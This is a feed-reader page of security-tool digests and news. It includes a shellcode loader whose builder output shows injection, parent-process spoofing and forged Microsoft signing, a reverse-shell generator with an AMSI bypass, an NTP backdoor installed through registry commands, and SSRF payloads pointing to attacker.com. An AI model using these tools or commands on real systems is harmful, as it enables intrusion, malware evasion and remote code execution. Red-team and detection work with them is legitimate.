FreshRSS

🔒
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayYour RSS feeds

NetLlix - A Project Created With An Aim To Emulate And Test Exfiltration Of Data Over Different Network Protocols


A project created with an aim to emulate and test exfiltration of data over different network protocols. The emulation is performed w/o the usage of native API's. This will help blue teams write correlation rules to detect any type of C2 communication or data exfiltration.


Currently, this project can help generate HTTP/HTTPS traffic (both GET and POST) using the below metioned progamming/scripting languages:

  • CNet/WebClient: Developed in CLang to generate network traffic using the well know WIN32 API's (WININET & WINHTTP) and raw socket programming.
  • HashNet/WebClient: A C# binary to generate network traffic using .NET class like HttpClient, WebRequest and raw sockets.
  • PowerNet/WebClient: PowerShell scripts to generate network traffic using socket programming.

Usage:

Download the latest ZIP from realease.

Running the server:

  • With SSl: python3 HTTP-S-EXFIL.py ssl

  • Without SSL: python3 HTTP-S-EXFIL.py

Running the client:

  • CNet - CNet.exe <Server-IP-ADDRESS> - Select any option
  • HashNet - ChashNet.exe <Server-IP-ADDRESS> - Select any option
  • PowerNet - .\PowerHttp.ps1 -ip <Server-IP-ADDRESS> -port <80/443> -method <GET/POST>


laZzzy - Shellcode Loader, Developed Using Different Open-Source Libraries, That Demonstrates Different Execution Techniques


laZzzy is a shellcode loader that demonstrates different execution techniques commonly employed by malware. laZzzy was developed using different open-source header-only libraries.

Features

  • Direct syscalls and native (Nt*) functions (not all functions but most)
  • Import Address Table (IAT) evasion
  • Encrypted payload (XOR and AES)
    • Randomly generated key
    • Automatic padding (if necessary) of payload with NOPS (\x90)
    • Byte-by-byte in-memory decryption of payload
  • XOR-encrypted strings
  • PPID spoofing
  • Blocking of non-Microsoft-signed DLLs
  • (Optional) Cloning of PE icon and attributes
  • (Optional) Code signing with spoofed cert

How to Use

Requirements:

  • Windows machine w/ Visual Studio and the following components, which can be installed from Visual Studio Installer > Individual Components:

    • C++ Clang Compiler for Windows and C++ Clang-cl for build tools

    • ClickOnce Publishing

  • Python3 and the required modules:

    • python3 -m pip install -r requirements.txt

Options:

(venv) PS C:\MalDev\laZzzy> python3 .\builder.py -h

⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣤⣤⣤⣤⠀⢀⣼⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀
⠀⠀⣿⣿⠀⠀⠀⠀⢀⣀⣀⡀⠀⠀⠀⢀⣀⣀⣀⣀⣀⡀⠀⢀⣼⡿⠁⠀⠛⠛⠒⠒⢀⣀⡀⠀⠀⠀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⣰⣾⠟⠋⠙⢻⣿⠀⠀⠛⠛⢛⣿⣿⠏⠀⣠⣿⣯⣤⣤⠄⠀⠀⠀⠀⠈⢿⣷⡀⠀⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⣿⣯ ⠀⠀⢸⣿⠀⠀⠀⣠⣿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⣧⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⠙⠿⣷⣦⣴⢿⣿⠄⢀⣾⣿⣿⣶⣶⣶⠆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⡿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀by: CaptMeelo⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠁⠀⠀⠀

usage: builder.py [-h] -s -p -m [-tp] [-sp] [-pp] [-b] [-d]

options:
-h, --help show this help message and exit
-s path to raw shellcode
-p password
-m shellcode execution method (e.g. 1)
-tp process to inject (e.g. svchost.exe)
-sp process to spawn (e.g. C:\\Windows\\System32\\RuntimeBroker.exe)
-pp parent process to spoof (e.g. explorer.exe)
-b binary to spoof metadata (e.g. C:\\Windows\\System32\\RuntimeBroker.exe)
-d domain to spoof (e.g. www.microsoft.com)

shellcode execution method:
1 Early-bird APC Queue (requires sacrificial proces)
2 Thread Hijacking (requires sacrificial proces)
3 KernelCallbackTable (requires sacrificial process that has GUI)
4 Section View Mapping
5 Thread Suspension
6 LineDDA Callback
7 EnumSystemGeoID Callback
8 FLS Callback
9 SetTimer
10 Clipboard

Example:

Execute builder.py and supply the necessary data.

(venv) PS C:\MalDev\laZzzy> python3 .\builder.py -s .\calc.bin -p CaptMeelo -m 1 -pp explorer.exe -sp C:\\Windows\\System32\\notepad.exe -d www.microsoft.com -b C:\\Windows\\System32\\mmc.exe

⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣤⣤⣤⣤⠀⢀ ⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⠀⠀⢀⣀⣀⡀⠀⠀⠀⢀⣀⣀⣀⣀⣀⡀⠀⢀⣼⡿⠁⠀⠛⠛⠒⠒⢀⣀⡀⠀⠀⠀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⣰⣾⠟⠋⠙⢻⣿⠀⠀⠛⠛⢛⣿⣿⠏⠀⣠⣿⣯⣤⣤⠄⠀⠀⠀⠀⠈⢿⣷⡀⠀⣰⣿⠃ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⣿⣯⠀⠀⠀⢸⣿⠀⠀⠀⣠⣿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⣧⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⠙⠿⣷⣦⣴⢿⣿⠄⢀⣾⣿⣿⣶⣶⣶⠆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⡿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀by: CaptMeelo⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠁⠀⠀⠀

[+] XOR-encrypting payload with
[*] Key: d3b666606468293dfa21ce2ff25e86f6

[+] AES-encrypting payload with
[*] IV: f96312f17a1a9919c74b633c5f861fe5
[*] Key: 6c9656ed1bc50e1d5d4033479e742b4b8b2a9b2fc81fc081fc649e3fb4424fec

[+] Modifying template using
[*] Technique: Early-bird APC Queue
[*] Process to inject: None
[*] Process to spawn: C:\\Windows\\System32\\RuntimeBroker.exe
[*] Parent process to spoof: svchost.exe

[+] Spoofing metadata
[*] Binary: C:\\Windows\\System32\\RuntimeBroker.exe
[*] CompanyName: Microsoft Corporation
[*] FileDescription: Runtime Broker
[*] FileVersion: 10.0.22621.608 (WinBuild.160101.0800)
[*] InternalName: RuntimeBroker.exe
[*] LegalCopyright: © Microsoft Corporation. All rights reserved.
[*] OriginalFilename: RuntimeBroker.exe
[*] ProductName: Microsoft® Windows® Operating System
[*] ProductVersion: 10.0.22621.608

[+] Compiling project
[*] Compiled executable: C:\MalDev\laZzzy\loader\x64\Release\laZzzy.exe

[+] Signing binary with spoofed cert
[*] Domain: www.microsoft.com
[*] Version: 2
[*] Serial: 33:00:59:f8:b6:da:86:89:70:6f:fa:1b:d9:00:00:00:59:f8:b6
[*] Subject: /C=US/ST=WA/L=Redmond/O=Microsoft Corporation/CN=www.microsoft.com
[*] Issuer: /C=US/O=Microsoft Corporation/CN=Microsoft Azure TLS Issuing CA 06
[*] Not Before: October 04 2022
[*] Not After: September 29 2023
[*] PFX file: C:\MalDev\laZzzy\output\www.microsoft.com.pfx

[+] All done!
[*] Output file: C:\MalDev\laZzzy\output\RuntimeBroker.exe

Libraries Used

Shellcode Execution Techniques

  1. Early-bird APC Queue (requires sacrificial process)
  2. Thread Hijacking (requires sacrificial process)
  3. KernelCallbackTable (requires sacrificial process that has a GUI)
  4. Section View Mapping
  5. Thread Suspension
  6. LineDDA Callback
  7. EnumSystemGeoID Callback
  8. Fiber Local Storage (FLS) Callback
  9. SetTimer
  10. Clipboard

Notes:

  • Only works on Windows x64
  • Debugging only works on Release mode
  • Sometimes, KernelCallbackTable doesn't work on the first run but will eventually work afterward

Credits/References



Octosuite - Advanced Github OSINT Framework


A framework fro gathering osint on GitHub users, repositories and organizations


Wiki

Refer to the Wiki for installation instructions, in addition to all other documentation.

Features

  • Fetches an organization's profile information
  • Fetches an oganization's events
  • Returns an organization's repositories
  • Returns an organization's public members
  • Fetches a repository's information
  • Returns a repository's contributors
  • Returns a repository's languages
  • Fetches a repository's stargazers
  • Fetches a repository's forks
  • Fetches a repository's releases
  • Returns a list of files in a specified path of a repository
  • Fetches a user's profile information
  • Returns a user's gists
  • Returns organizations that a user owns/belongs to
  • Fetches a user's events
  • Fetches a list of users followed by the target
  • Fetches a user's followers
  • Checks if user A follows user B
  • Checks if user is a public member of an organizations
  • Returns a user's subscriptions
  • Gets a user's subscriptions
  • Gets a user's events
  • Searches users
  • Searches repositories
  • Searches topics
  • Searches issues
  • Searches commits
  • Automatically logs network activity (.logs folder)
  • User can view, read and delete logs
  • ...And more

Note

Octosuite automatically logs network and user activity of each session, the logs are saved by date and time in the .logs folder



Malware Strains Targeting Python and JavaScript Developers Through Official Repositories

An active malware campaign is targeting the Python Package Index (PyPI) and npm repositories for Python and JavaScript with typosquatted and fake modules that deploy a ransomware strain, marking the latest security issue to affect software supply chains. The typosquatted Python packages all impersonate the popular requests library: dequests, fequests, gequests, rdquests, reauests, reduests,

Pylirt - Python Linux Incident Response Toolkit


With this application, it is aimed to accelerate the incident response processes by collecting information in linux operating systems.


Features

Information is collected in the following contents.

/etc/passwd

cat /etc/group

cat /etc/sudoers

lastlog

cat /var/log/auth.log

uptime/proc/meminfo

ps aux

/etc/resolv.conf

/etc/hosts

iptables -L -v -n

find / -type f -size +512k -exec ls -lh {}/;

find / -mtime -1 -ls

ip a

netstat -nap

arp -a

echo $PATH

Installation

git clone https://github.com/anil-yelken/pylirt

cd pylirt

sudo pip3 install paramiko

Usage

The following information should be specified in the cred_list.txt file:

IP|Username|Password

sudo python3 plirt.py

Contact

https://twitter.com/anilyelken06

https://medium.com/@anilyelken



Shells - Little Script For Generating Revshells


A script for generating common revshells fast and easy.
Especially nice when in need of PowerShell and Python revshells, which can be a PITA getting correctly formated.

PowerShell revshells

  • Shows username@computer, above the prompt and working-directory
  • Has a partial AMSI-bypass, making some stuff a bit easier
  • TCP and UDP
  • Windows Powershell and Core Powershell
  • Functions for uploading and downloading files. (Using Updog by sc0tfree)

ngrok support

  • ngrok can be started/stopped from inside the script
  • payloads will be genereated with the ngrok addresses

Updog support

  • you can start/stop Updog from inside the script
  • The PowerShell revshells have upload/download function embedded
  • To upload from nix using curl: curl -F path="absolute path for Updog-folder" -F file=filename http://UpdogIP/upload

To install Shells

git clone https://github.com/4ndr34z/shells
cd shells
./install.sh

Screenshots

Youtube video


Version 1.4.6

  • Added webshells (ASPX, PHP, JSP)

Version 1.4.5

  • Added 2 c++ revshell binaries for Windows 32 and 64 bit.

Version 1.4.4

  • Fixed the handling of starting/stopping Updog

Version 1.4.3

  • Added Updog support
  • Added Netcat binaries.
  • Powershell: Created upload/download functionality (upload requires Updog for receiving files)
  • Added more information about running ngrok and Updog.

Version 1.4.2

  • PowerShell: Added a new "mini AMSI-bypass". (It is a partial bypass) Based on Matt Graebers Reflection method
  • PowerShell: Added a "upload" function in the Powershell reverseshell

Version 1.4.1

  • Removed AMSI. Not tested enough :-)

Version 1.4

  • Added AMSI-bypass for the powershell payloads

Version 1.3.9

  • Fixed bug when setting port
  • Changed default port to 443
  • PowerShell: obfuscated some more

Version 1.3.8

  • PowerShell: Minor changes to the UDP payload

Version 1.3.7

  • Using only native nc on macOS, because the one on homebrew doesn't work on incoming UDP
  • PowerShell: Added UDP payloads

Version 1.3.6

  • PowerShell: Added more payloads

Version 1.3.5

Version 1.3.4

  • PowerShell: Using UTF8 encoding in payload

Version 1.3.3

  • Added Golang

Version 1.3.2

  • Added OpenSSL

Version 1.3.1

  • Fixed bug in Python revshell
  • Added awk
  • Added Bash UDP

Version 1.3

  • Added Windows Python revshells

Version 1.2.9

  • Added a ngrok running-status

Version 1.2.8

  • Hiding ngrok choice if not installed

Version 1.2.7

  • Fixed the install options: not doing default option when pressing enter without making a choice

Version 1.2.6

  • Added support for ngrok.

Version 1.2.4

  • Added a install-script
  • Added install options for checking and installing missing dependencies

Version 1.2.3

  • Added a couple of PHP shells

Version 1.2.2

  • Added shells for: Ruby, Perl, Telnet and zsh

Version 1.2.1

  • Added copy to clipboard using pbcopy on macOS
  • Added info about listening netcat as the macOS versions doesn't display that

Version 1.2

  • Added looping netcat shells. Calls back every 10 seconds. Great in case you loose your shell
  • Added check for netcat GNU netcat 0.7.0 Homebrew when running on macOS

Version 1.1

  • Added support for macOS


Octopii - An AI-powered Personal Identifiable Information (PII) Scanner


Octopii is an open-source AI-powered Personal Identifiable Information (PII) scanner that can look for image assets such as Government IDs, passports, photos and signatures in a directory.


Working

Octopii uses Tesseract's Optical Character Recognition (OCR) and Keras' Convolutional Neural Networks (CNN) models to detect various forms of personal identifiable information that may be leaked on a publicly facing location. This is done in the following steps:

1. Importing and cleaning image(s)

The image is imported via OpenCV and Python Imaging Library (PIL) and is cleaned, deskewed and rotated for scanning.

2. Performing image classification and Optical Character Recognition (OCR)

A directory is looped over and searched for images. These images are scanned for unique features via the image classifier (done by comparing it to a trained model), along with OCR for finding substrings within the image. This may have one of the following outcomes:

  • Best case (score >=90): The image is sent into the image classifier algorithm to be scanned for features such as an ISO/IEC 7810 card specification, colors, location of text, photos, holograms etc. If it is successfully classified as a type of PII, OCR is performed on it looking for particular words and strings as a final check. When both of these are confirmed, the result from Octopii is extremely reliable.

  • Average case (score >=50): The image is partially/incorrectly identified by the image classifier algorithm, but an OCR check finds contradicting substrings and reclassifies it.

  • Worst case (score >=0): The image is only identified by the image classifier algorithm but an OCR scan returns no results.

  • Incorrect classification: False positives due to a very small model or OCR list may incorrectly classify PIIs, giving inaccurate results.

As a final verification method, images are scanned for certain strings to verify the accuracy of the model.

The accuracy of the scan can determined via the confidence scores in output. If all the mentioned conditions are met, a score of 100.0 is returned.

To train the model, data can also be fed into the model_generator.py script, and the newly improved h5 file can be used.

Usage

  1. Install all dependencies via pip install -r requirements.txt.
  2. Install the Tesseract helper locally via sudo apt install tesseract-ocr -y (for Ubuntu/Debian).
  3. To run Octopii, type python3 octopii.py <location name>, for example python3 octopii.py pii_list/
python3 octopii.py <location to scan> <additional flags>

Octopii currently supports local scanning and scanning S3 directories and open directory listings via their URLs.

Example

Contributing

Open-source projects like these thrive on community support. Since Octopii relies heavily on machine learning and optical character recognition, contributions are much appreciated. Here's how to contribute:

1. Fork

Fork the official repository at https://github.com/redhuntlabs/octopii

2. Understand

There are 3 files in the models/ directory. - The keras_models.h5 file is the Keras h5 model that can be obtained from Google's Teachable Machine or via Keras in Python. - The labels.txt file contains the list of labels corresponding to the index that the model returns. - The ocr_list.json file consists of keywords to search for during an OCR scan, as well as other miscellaneous information such as country of origin, regular expressions etc.

Generating models via Teachable Machine

Since our current dataset is quite small, we could benefit from a large Keras model of international PII for this project. If you do not have expertise in Keras, Google provides an extremely easy to use model generator called the Teachable Machine. To use it:

  • Visit https://teachablemachine.withgoogle.com/train and select 'Image Project' → 'Standard Image Model'.
  • A few classes are visible. Rename the class to an asset type ypu'd like to upload, such as "German Passport" or "California Driver License".
  • Add images by clicking the 'Upload' button and upload some image assets. Note: images have to be square

Tip: segregate your image assets into folders with the folder name being the same as the class name. You can then drag and drop a folder into the upload dialog.

  • Click '+ Add a class' at the bottom of the page to add more classes with data and repeat. You can make the classes more specific, such as "Goa Driver License Old Format".

Note: Only upload the same as the class name, for example, the German Passport class must have German Passport pictures. Uploading the wrong data to the wrong class will confuse the machine learning algorithms.

  • Verify the classes and images one last time. Once you're ready, click on the 'Train Model' button. You can increase the epoch size (such as 5000) to improve model accuracy.
  • To test, you can test the model by clicking the Input dropdown and selecting 'File', then uploading a sample image.
  • Once you're ready, click the 'Export Model' button. In the dialog that pops up, select the 'Tensorflow' tab (not Tensorflow.js) and select the 'Keras' radio button, then click 'Download my model' to export the newly generated model. Extract the downloaded zip file and paste the keras_model.h5 file and labels.txt file into the models/ directory in Octopii.

The images used for the model above are not visible to us since they're in a proprietary format. You can use both dummy and actual PII. Make sure they are square-ish in image size.

Updating OCR list

Once you generate models using Teachable Machine, you can improve Octopii's accuracy via OCR. To do this:

  • Open the existing ocr_list.json file. Create a JSONObject with the key having the same name as the asset class. NOTE: The key name must be exactly the same as the asset class name from Teachable Machine.
  • For the keywords, use as many unique terms from your asset as possible, such as "Income Tax Department". Store them in a JSONArray.
  • (Advanced) you can also add regexes for things like ID numbers and MRZ on passports if they are unique enough. Use https://regex101.com to test your regexes before adding them.
  • Save/overwrite the existing ocr_list.json file.

3. Edit

You can replace each file you modify in the models/ directory after you create or edit them via the above methods.

4. Pull request

Submit a pull request from your forked repo and we'll pick it up and replace our current model with it if the changes are large enough.

Note: Please take the following steps to ensure quality

  • Make sure the model returns extremely accurate results by testing it locally first.
  • Use proper text casing for label names in both the Keras model and ocr_list.json.
  • Make sure all JSON is valid with appropriate character escapes with no duplicate keys, regexes or keywords.
  • For country names, please use the ISO 3166-1 alpha-2 code of the country.

Credits

License

MIT License

(c) Copyright 2022 RedHunt Labs Private Limited

Author: Owais Shaikh



autoSSRF - Smart Context-Based SSRF Vulnerabiltiy Scanner


autoSSRF is your best ally for identifying SSRF vulnerabilities at scale. Different from other ssrf automation tools, this one comes with the two following original features :

  • Smart fuzzing on relevant SSRF GET parameters

    When fuzzing, autoSSRF only focuses on the common parameters related to SSRF (?url=, ?uri=, ..) and doesn’t interfere with everything else. This ensures that the original URL is still correctly understood by the tested web-application, something that might doesn’t happen with a tool which is blindly spraying query parameters.

  • Context-based dynamic payloads generation

    For the given URL : https://host.com/?fileURL=https://authorizedhost.com, autoSSRF would recognize authorizedhost.com as a potentially white-listed host for the web-application, and generate payloads dynamically based on that, attempting to bypass the white-listing validation. It would result to interesting payloads such as : http://authorizedhost.attacker.com, http://authorizedhost%252F@attacker.com, etc.

Furthermore, this tool guarantees almost no false-positives. The detection relies on the great ProjectDiscovery’s interactsh, allowing autoSSRF to confidently identify out-of-band DNS/HTTP interactions.


Usage

python3 autossrf.py -h

This displays help for the tool.

usage: autossrf.py [-h] [--file FILE] [--url URL] [--output] [--verbose]

options:
-h, --help show this help message and exit
--file FILE, -f FILE file of all URLs to be tested against SSRF
--url URL, -u URL url to be tested against SSRF
--output, -o output file path
--verbose, -v activate verbose mode

Single URL target:

python3 autossrf.py -u https://www.host.com/?param1=X&param2=Y&param2=Z

Multiple URLs target with verbose:

python3 autossrf.py -f urls.txt -v

Installation

1 - Clone

git clone https://github.com/Th0h0/autossrf.git

2 - Install requirements

Python libraries :

cd autossrf 
pip install -r requirements.txt

Interactsh-Client :

go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest

License

autoSSRF is distributed under MIT License.



Researchers Uncover PyPI Package Hiding Malicious Code Behind Image File

A malicious package discovered on the Python Package Index (PyPI) has been found employing a steganographic trick to conceal malicious code within image files. The package in question, named "apicolor," was uploaded to the Python third-party repository on October 31, 2022, and described as a "Core lib for REST API," according to Israeli cybersecurity firm Check Point. It has since been taken

Researchers Uncover 29 Malicious PyPI Packages Targeted Developers with W4SP Stealer

Cybersecurity researchers have uncovered 29 packages in Python Package Index (PyPI), the official third-party software repository for the Python programming language, that aim to infect developers' machines with a malware called W4SP Stealer. "The main attack seems to have started around October 12, 2022, slowly picking up steam to a concentrated effort around October 22," software supply chain

Sandman - NTP Based Backdoor For Red Team Engagements In Hardened Networks


Sandman is a backdoor that is meant to work on hardened networks during red team engagements.

Sandman works as a stager and leverages NTP (a protocol to sync time & date) to get and run an arbitrary shellcode from a pre-defined server.

Since NTP is a protocol that is overlooked by many defenders resulting in wide network accessibility.


Usage

SandmanServer (Usage)

Run on windows / *nix machine:

python3 sandman_server.py "Network Adapter" "Payload Url" "optional: ip to spoof"
  • Network Adapter: The adapter that you want the server to listen on (for example Ethernet for Windows, eth0 for *nix).

  • Payload Url: The URL to your shellcode, it could be your agent (for example, CobaltStrike or meterpreter) or another stager.

  • IP to Spoof: If you want to spoof a legitimate IP address (for example, time.microsoft.com's IP address).

SandmanBackdoor (Usage)

To start, you can compile the SandmanBackdoor as mentioned below, because it is a single lightweight C# executable you can execute it via ExecuteAssembly, run it as an NTP provider or just execute/inject it.

SandmanBackdoorTimeProvider (Usage)

To use it, you will need to follow simple steps:

  • Add the following registry value:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient" /v DllName /t REG_SZ /d "C:\Path\To\TheDll.dll"
  • Restart the w32time service:
sc stop w32time
sc start w32time

NOTE: Make sure you are compiling with the x64 option and not any CPU option!

Capabilities

  • Getting and executing an arbitrary payload from an attacker's controlled server.

  • Can work on hardened networks since NTP is usually allowed in FW.

  • Impersonating a legitimate NTP server via IP spoofing.

Setup

SandmanServer (Setup)

SandmanBackdoor (Setup)

To compile the backdoor I used Visual Studio 2022, but as mentioned in the usage section it can be compiled with both VS2022 and CSC. You can compile it either using the USE_SHELLCODE and use Orca's shellcode or without USE_SHELLCODE to use WebClient.

SandmanBackdoorTimeProvider (Setup)

To compile the backdoor I used Visual Studio 2022, you will also need to install DllExport (via Nuget or any other way) to compile it. You can compile it either using the USE_SHELLCODE and use Orca's shellcode or without USE_SHELLCODE to use WebClient.

IOCs

  • A shellcode is injected into RuntimeBroker.

  • Suspicious NTP communication starts with a known magic header.

  • YARA rule.

Contributes

Thanks to those who already contributed and I'll happily accept contributions, make a pull request and I will review it!



xnLinkFinder - A Python Tool Used To Discover Endpoints (And Potential Parameters) For A Given Target

About - v2.0

This is a tool used to discover endpoints (and potential parameters) for a given target. It can find them by:

  • crawling a target (pass a domain/URL)
  • crawling multiple targets (pass a file of domains/URLs)
  • searching files in a given directory (pass a directory name)
  • get them from a Burp project (pass location of a Burp XML file)
  • get them from an OWASP ZAP project (pass location of a ZAP ASCII message file)

The python script is based on the link finding capabilities of my Burp extension GAP. As a starting point, I took the amazing tool LinkFinder by Gerben Javado, and used the Regex for finding links, but with additional improvements to find even more.


Installation

xnLinkFinder supports Python 3.

$ git clone https://github.com/xnl-h4ck3r/xnLinkFinder.git
$ cd xnLinkFinder
$ sudo python setup.py install

Usage

Arg Long Arg Description
-i --input Input a: URL, text file of URLs, a Directory of files to search, a Burp XML output file or an OWASP ZAP output file.
-o --output The file to save the Links output to, including path if necessary (default: output.txt). If set to cli then output is only written to STDOUT. If the file already exist it will just be appended to (and de-duplicated) unless option -ow is passed.
-op --output-params The file to save the Potential Parameters output to, including path if necessary (default: parameters.txt). If set to cli then output is only written to STDOUT (but not piped to another program). If the file already exist it will just be appended to (and de-duplicated) unless option -ow is passed.
-ow --output-overwrite If the output file already exists, it will be overwritten instead of being appended to.
-sp --scope-prefix Any links found starting with / will be prefixed with scope domains in the output instead of the original link. If the passed value is a valid file name, that file will be used, otherwise the string literal will be used.
-spo --scope-prefix-original If argument -sp is passed, then this determines whether the original link starting with / is also included in the output (default: false)
-sf --scope-filter Will filter output links to only include them if the domain of the link is in the scope specified. If the passed value is a valid file name, that file will be used, otherwise the string literal will be used.
-c --cookies † Add cookies to pass with HTTP requests. Pass in the format 'name1=value1; name2=value2;'
-H --headers † Add custom headers to pass with HTTP requests. Pass in the format 'Header1: value1; Header2: value2;'
-ra --regex-after RegEx for filtering purposes against found endpoints before output (e.g. /api/v[0-9]\.[0-9]\* ). If it matches, the link is output.
-d --depth † The level of depth to search. For example, if a value of 2 is passed, then all links initially found will then be searched for more links (default: 1). This option is ignored for Burp files because they can be huge and consume lots of memory. It is also advisable to use the -sp (--scope-prefix) argument to ensure a request to links found without a domain can be attempted.
-p --processes † Basic multithreading is done when getting requests for a URL, or file of URLs (not a Burp file). This argument determines the number of processes (threads) used (default: 25)
-x --exclude Additional Link exclusions (to the list in config.yml) in a comma separated list, e.g. careers,forum
-orig --origin Whether you want the origin of the link to be in the output. Displayed as LINK-URL [ORIGIN-URL] in the output (default: false)
-t --timeout † How many seconds to wait for the server to send data before giving up (default: 10 seconds)
-inc --include Include input (-i) links in the output (default: false)
-u --user-agent † What User Agents to get links for, e.g. -u desktop mobile
-insecure Whether TLS certificate checks should be disabled when making requests (delfault: false)
-s429 Stop when > 95 percent of responses return 429 Too Many Requests (default: false)
-s403 Stop when > 95 percent of responses return 403 Forbidden (default: false)
-sTO Stop when > 95 percent of requests time out (default: false)
-sCE Stop when > 95 percent of requests have connection errors (default: false)
-m --memory-threshold The memory threshold percentage. If the machines memory goes above the threshold, the program will be stopped and ended gracefully before running out of memory (default: 95)
-mfs --max-file-size † The maximum file size (in bytes) of a file to be checked if -i is a directory. If the file size os over, it will be ignored (default: 500 MB). Setting to 0 means no files will be ignored, regardless of size..
-replay-proxy For active link finding with URL (or file of URLs), replay the requests through this proxy.
-ascii-only Whether links and parameters will only be added if they only contain ASCII characters. This can be useful when you know the target is likely to use ASCII characters and you also get a number of false positives from binary files for some reason.
-v --verbose Verbose output
-vv --vverbose Increased verbose output
-h --help show the help message and exit

† NOT RELEVANT FOR INPUT OF DIRECTORY, BURP XML FILE OR OWASP ZAP FILE

config.yml

The config.yml file has the keys which can be updated to suit your needs:

  • linkExclude - A comma separated list of strings (e.g. .css,.jpg,.jpeg etc.) that all links are checked against. If a link includes any of the strings then it will be excluded from the output. If the input is a directory, then file names are checked against this list.
  • contentExclude - A comma separated list of strings (e.g. text/css,image/jpeg,image/jpg etc.) that all responses Content-Type headers are checked against. Any responses with the these content types will be excluded and not checked for links.
  • fileExtExclude - A comma separated list of strings (e.g. .zip,.gz,.tar etc.) that all files in Directory mode are checked against. If a file has one of those extensions it will not be searched for links.
  • regexFiles - A list of file types separated by a pipe character (e.g. php|php3|php5 etc.). These are used in the Link Finding Regex when there are findings that aren't obvious links, but are interesting file types that you want to pick out. If you add to this list, ensure you escape any dots to ensure correct regex, e.g. js\.map
  • respParamLinksFound † - Whether to get potential parameters from links found in responses: True or False
  • respParamPathWords † - Whether to add path words in retrieved links as potential parameters: True or False
  • respParamJSON † - If the MIME type of the response contains JSON, whether to add JSON Key values as potential parameters: True or False
  • respParamJSVars † - Whether javascript variables set with var, let or const are added as potential parameters: True or False
  • respParamXML † - If the MIME type of the response contains XML, whether to add XML attributes values as potential parameters: True or False
  • respParamInputField † - If the MIME type of the response contains HTML, whether to add NAME and ID attributes of any INPUT fields as potential parameters: True or False
  • respParamMetaName † - If the MIME type of the response contains HTML, whether to add NAME attributes of any META tags as potential parameters: True or False

† IF THESE ARE NOT FOUND IN THE CONFIG FILE THEY WILL DEFAULT TO True

Examples

Find Links from a specific target - Basic

python3 xnLinkFinder.py -i target.com

Find Links from a specific target - Detailed

Ideally, provide scope prefix (-sp) with the primary domain (including schema), and a scope filter (-sf) to filter the results only to relevant domains (this can be a file or in scope domains). Also, you can pass cookies and customer headers to ensure you find links only available to authorised users. Specifying the User Agent (-u desktop mobile) will first search for all links using desktop User Agents, and then try again using mobile user agents. There could be specific endpoints that are related to the user agent given. Giving a depth value (-d) will keep sending request to links found on the previous depth search to find more links.

python3 xnLinkFinder.py -i target.com -sp target_prefix.txt -sf target_scope.txt -spo -inc -vv -H 'Authorization: Bearer XXXXXXXXXXXXXX' -c 'SessionId=MYSESSIONID' -u desktop mobile -d 10

Find Links from a list of URLs - Basic

